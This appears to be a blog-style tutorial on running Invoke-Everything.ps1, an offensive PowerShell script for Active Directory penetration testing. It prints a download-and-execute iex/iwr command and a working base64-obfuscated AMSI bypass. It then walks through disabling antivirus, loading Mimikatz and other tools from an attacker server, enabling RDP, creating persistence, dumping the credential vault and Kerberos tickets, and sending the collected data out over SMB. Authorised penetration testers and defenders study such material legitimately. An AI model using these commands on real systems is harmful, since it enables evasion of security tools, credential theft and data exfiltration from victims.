Invoke-Everything.ps1
Quick article explaining how to use Invoke-Everything, a script made by OvergrownCarrot1 (OGC). The script can be found here: https://github.com/overgrowncarrot1/Invoke-Everything/blob/main/invoke-everything.ps1
Invoke-Everything utilizes different PowerShell scripts to help with viewing a network, automating many of the commands that are used for Active Directory Penetration Testing. Invoke-Everything asks quite a few questions, utilizing with evil-winrm may not work properly. The script works best either in a PowerShell session or RDP. The following scripts will be needed to use Invoke-Everything to its fullest capabilities:
PowerUp.ps1, PowerView.ps1, PowerView_Dev.ps1, PowerUpSQL.ps1, Invoke-Mimikatz.ps1, SharpHound.ps1
The Scripts used can be found at the bottom of this article.
Starting off with Invoke-Everything a user can either put in on disk or in memory, I suggest in memory. Invoke-Everything can be put into memory on a Windows system with the following command:
iex (iwr -usebasicparsing https://github.com/overgrowncarrot1/Invoke-Everything/blob/main/invoke-everything.ps1)
Once in memory a user can utilize the command Invoke-Everything -AttackerIp <attacker ip address>. This will start the script.
The script will call back to the attacking machine IP address and put the tools at the bottom of the article into memory, which means you will most likely need to do an AMSI bypass like the one below.
[Ref].Assembly.GetType(‘System.Management.Automation.’+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘QQBtAHMAaQBVAHQAaQBsAHMA’)))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==’))),’NonPublic,Static’).SetValue($null,$true)
The attacker will also need a web server running on their attacker machine. Ensure that the attacker has all of the files needed within the same folder, which will allow for the different files to be downloaded into memory. Also the attacker should have an SMB server running on the attacking machine. As the script runs it will save information into different files and then try to send all of those files back to the attacking machine through SMB. Attackers should have SMB running and have the -smb2support argument.
The first thing Invoke-Everything tries to do is disable Real Time Monitoring and also disable AV protection, if user does not have administrator privileges this most likely will not work. The script then gets networking information, such as Internet Protocol information and also Address Resolution Protocol information. After this the different PowerShell scripts listed below will start be called for by the victim machine and Invoke-Everything will utilize those scripts to continue finding more information for the attacker.
Below is a walkthrough of how to utilize Invoke-Everything.ps1 by OGC, we will be utilizing a system that we have administrator access on:
First we have all of the tools needed within the same folder and have started a web server:
Lets also start up our SMB server on our attacker machine
As we try to put invoke-everything onto the victim machine we realize that first an AMSI bypass is needed
Now we can run the script without any problems
As you can see the first question is would you like to run an AMSI bypass, although we already did one we can say Y and run it again
We are then asked if we have a web server running and also SMB running, which we do
Now the script starts to run, in the beginning it does not do anything malicious. We start off by getting the PowerShell command history, seeing if the machine is in a domain or workgroup, finding installed software and hotfixes, trying to disable Real Time Monitoring, looking at the firewall policy and also making a tree of the C:\ drive. This part can take a while and the tree is put into a tree.txt file. This file is sent back to the attackers SMB server.
At this point if the script takes longer than five minutes press enter, PowerShell gets stuck sometimes, however, if it messes with the rest of the script you may need to comment out the following lines due to how the PowerShell works and the tree command. If you comment out those lines make sure to put invoke-everything back into memory to get the most updated script.
After this the script will then ask if we want to run a port scan, an Internal and External scan will only run a port scan on certain ports. The InDepthInternal and InDepthExternal will run on all ports and may take a long time, for this demonstration we will run an Internal port scan. The script will seem frozen it is not, let it run.
Next we are asked if we want to turn on RDP on the system, we will answer Y
Now if you have the proper permission port 3389 should be open on the victim machine and you should also have invoke.txt on your attacker machine through the SMB share (again depending on permissions, the script isn’t magic)
The script will then attempt to see if the user is an administrator, if they are mimikatz commands will be ran, if not then the script will skip this next portion
After this persistence is created and the script asks more questions before continuing, the next portion if you do not understand what it is asking then answer N, it can be extremely dangerous to drop some of this information
For our demonstration we will answer Y
As you can see above we dropped the cred vault and also the tickets
More dangerous stuff
After this we can try to do some other things such as pass the hash and get into an SQL server if one exists. We will not be doing either for this demonstration
Now the only thing left to do is look at the different files that were made and start to look through them to find ways to either A) Priv Esc or (B) Laterally move
Lastly, remember there is going to be a lot of information output, this is something that you need to comb through and look for the different information that you want. Hopefully the script helps and thanks for reading.